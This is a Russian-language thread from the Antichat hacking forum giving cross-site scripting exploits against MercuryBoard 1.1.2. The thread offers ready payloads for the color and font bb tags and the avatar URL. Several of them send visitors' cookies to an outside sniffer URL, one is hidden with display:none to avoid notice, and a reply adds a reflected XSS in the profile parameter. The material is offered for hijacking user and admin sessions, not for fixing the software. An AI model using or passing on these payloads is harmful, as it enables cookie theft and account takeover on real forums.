Форум АНТИЧАТ - Еще парочка xss в MercuryBoard

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Еще парочка xss в MercuryBoard (https://forum.antichat.xyz/showthread.php?t=5971)

Еще парочка xss в MercuryBoard

Несколько уязвимостей xss в форуме MercuryBoard
(2 ПРИМИТИВНЕЙШИХ в bb тегах и 1 в аватарке)

1 из них заключается в плохой защищенности bb тега color, что дает нам право внедрить в него xss иньекцию.
Итак, вот сплойт:
Для алерта:

Код:

[color=black;background:url(javascript:alert(document.cookie))]123[/color]

И для сниффа:

Код:

[color=black;background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie);]123[/color]

2 уязвимость заключается в плохой защищенности bb тега font, что также дает возможность внедрить в его тело вредоносный код.
Для алерта:

Код:

[font=courier;background:url(javascript:alert(document.cookie))]123[/font]

И для сниффа:

Код:

[font=courier;background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie)]123[/font]

3 дыра самая интересная и самая матерая, это уязвимость в аватарке. Мы можем внедрить в адресс аватара свой сплойт, при этом со стороны это не будет никак выкупатся=), а сплойт тем временем будет собирать кукисы всех, кто будет читать ваши посты, или кто заглянет к вам в личный кабинет. При этом, при просмотре свойств аватара, пользователь не увидит ничего подозрительного, так как, в адресе будет указано http://smailiki.ru/smile/1.gif/ . Как видим, слеш в конце нам все поганит, это проявляется из-за экранирования знака (') ,бек слешем. Но с этим ничего не поделаешь, и хоть аватарка отображатся не будет, у обычных пользователей, да даже у админов, имхо это вызовет мало подозрений. Пускай думают что глюки.=)
Чуть не забыл, вот и сплойт:

Код:

http://smailiki.ru/smile/1.gif'style=background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie;);1.gif

ну и как уже стало традицией, алерт:

Код:

http://smailiki.ru/smile/1.gif'style=background:url(javascript:alert(document.cookie));1.gif

Уже когда все набрал, подумал, а зачем аватврка нам вообще нужна, сделаем её невидимой, как будто бы её вообще нету. И ход этот правильный, так как палива в данной ситуации ноль. Итак, вот сплойт:

Код:

'style=background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie);display:none;1.gif

Укажи плиз версию MercuryBoard...
И кроме того, если публикуете такие баги, то не мешало бы описать систему защиты форума в целом. Хранится ли пасс в куках, не используется ли двойное хеширование и т.п. Потому как эти XSS могут ничего и не давать.

Цитата:

Сообщение от Algol

Я проганял это всё на форуме версии 1.1.2
В куках хранятся только id пользователя и его md5 хеш, следует на сниффер мы получаем эти данные. Вот алерт как пример:

http://oldhz.h14.ru/mer.png

пробовал ли на других форумах?

Помоему там все было найдено... Или я ошибаюсь

Цитата:

Сообщение от qBiN

пробовал ли на других форумах?

Ну вот скрин к примеру: http://rts.h15.ru/mer1.png и http://rts.h15.ru/mer2.png

Цитата:

Сообщение от KEZ

Помоему там все было найдено... Или я ошибаюсь

ХЗ, когда нашел прежде всего проверил на секлабе, таких нет, а были бы найдены, полюбому были бы там, имхо.

Цитата:

Сообщение от KEZ

Помоему там все было найдено... Или я ошибаюсь

Если не ошибаешься подскажи тогда для vBullentin'a и phpBB , вроде где-то читал что малую фильтрацию проходят и что можно "захватить"
cp юзверя в phpbb или я уже запамятовал...

Вот ещё одна xss`ска(в профиле):

Код:

http://www.site.ru/mercutyboard/index.php?a=profile&w=<script>alert(document.cookie)</script>

Интуиция подсказывает что это ещё не всё....

Да там ещё КСТАТИ почти ни один параметр не проверяется перед mysql_query